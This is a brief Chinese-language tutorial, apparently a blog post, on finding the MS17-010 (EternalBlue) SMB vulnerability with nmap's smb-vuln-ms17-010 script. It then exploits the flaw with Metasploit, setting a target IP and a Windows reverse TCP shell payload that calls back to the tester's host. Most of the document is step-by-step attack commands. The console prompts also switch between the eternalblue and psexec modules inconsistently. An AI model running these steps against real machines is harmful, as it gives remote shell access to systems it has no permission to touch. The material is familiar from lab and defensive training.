一、使用nmap scripts判断主机是否存在ms17010漏洞

1.1 判断script是否有ms17010扫描脚本
[root@sz scripts]# ls /usr/share/nmap/scripts/ |grep ms17
smb-vuln-ms17-010.nse
1.1.1说明:nmap使用的版本为7.70自带永恒之蓝漏洞补丁,如果非新版本可能不存在该脚本,需要到官网获取:
漏洞利用方面:https://nmap.org/nsedoc/categories/vuln.html
权限验证方面:https://nmap.org/nsedoc/categories/auth.html
暴力破解方面:https://nmap.org/nsedoc/categories/brute.html
服务信息发现:https://nmap.org/nsedoc/categories/discovery.html    
DOS攻击方面:https://nmap.org/nsedoc/categories/dos.html
漏洞利用方面:https://nmap.org/nsedoc/categories/exploit.html
外部扩展方面:https://nmap.org/nsedoc/categories/external.html 
FUZZ测试方面:https://nmap.org/nsedoc/categories/fuzzer.html
一些针对的服务入侵模块:https://nmap.org/nsedoc/categories/intrusive.html
恶意后门方面:https://nmap.org/nsedoc/categories/malware.html
版本识别:https://nmap.org/nsedoc/categories/version.html
1.2 nmap加载脚本判断目标主机是否存在漏洞
[root@sz scripts]# nmap --script=smb-vuln-ms17-010 192.200.255.123



(说明:漏洞确实存在)


1.3 MSF加载模块进行渗透利用
[root@sz /]# msfconsole
    ...
    msf > search ms17_010
    msf > use exploit/windows/smb/ms17_010_eternalblue
    msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST
    192.200.255.123
    msf exploit(windows/smb/ms17_010_psexec) > set payload  
    windows/x64/shell/reverse_tcp
    msf exploit(windows/smb/ms17_010_psexec) > set LHOST 
    192.200.254.224
    msf exploit(windows/smb/ms17_010_psexec) > exploit 



END!